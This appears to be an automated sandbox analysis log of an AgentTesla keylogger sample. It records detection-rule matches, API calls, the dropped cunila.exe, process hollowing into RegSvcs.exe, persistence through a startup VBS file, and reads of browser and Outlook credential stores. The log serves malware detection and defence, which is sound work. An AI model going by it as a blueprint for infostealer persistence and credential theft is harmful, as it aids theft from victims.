                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@3/2
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F37B5 GetLastError,FormatMessageW,0_2_008F37B5
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E10BF AdjustTokenPrivileges,CloseHandle,0_2_008E10BF
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008E16C3
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005810BF AdjustTokenPrivileges,CloseHandle,2_2_005810BF
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_005816C3
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_008F51CD
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0090A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0090A67C
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_008F648E
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008842A2
                    Source: C:\Users\user\Desktop\SAL987656700.exeFile created: C:\Users\user\AppData\Local\enterogenousJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\SAL987656700.exeFile created: C:\Users\user\AppData\Local\Temp\gunfightsJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SAL987656700.exeReversingLabs: Detection: 44%
                    Source: C:\Users\user\Desktop\SAL987656700.exeFile read: C:\Users\user\Desktop\SAL987656700.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SAL987656700.exe "C:\Users\user\Desktop\SAL987656700.exe"
                    Source: C:\Users\user\Desktop\SAL987656700.exeProcess created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\Desktop\SAL987656700.exe"
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SAL987656700.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe"
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe"
                    Source: C:\Users\user\Desktop\SAL987656700.exeProcess created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\Desktop\SAL987656700.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SAL987656700.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008842DE
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A0A76 push ecx; ret 0_2_008A0A89
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00921005 push esi; ret 0_2_0092100E
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00540A76 push ecx; ret 2_2_00540A89
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005C1005 push esi; ret 2_2_005C100E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1E79D push ds; iretd 6_2_00E1E73B
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\SAL987656700.exeFile created: C:\Users\user\AppData\Local\enterogenous\cunila.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbsJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0089F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0089F98E
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00911C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00911C41
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0053F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0053F98E
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_005B1C41
                    Source: C:\Users\user\Desktop\SAL987656700.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
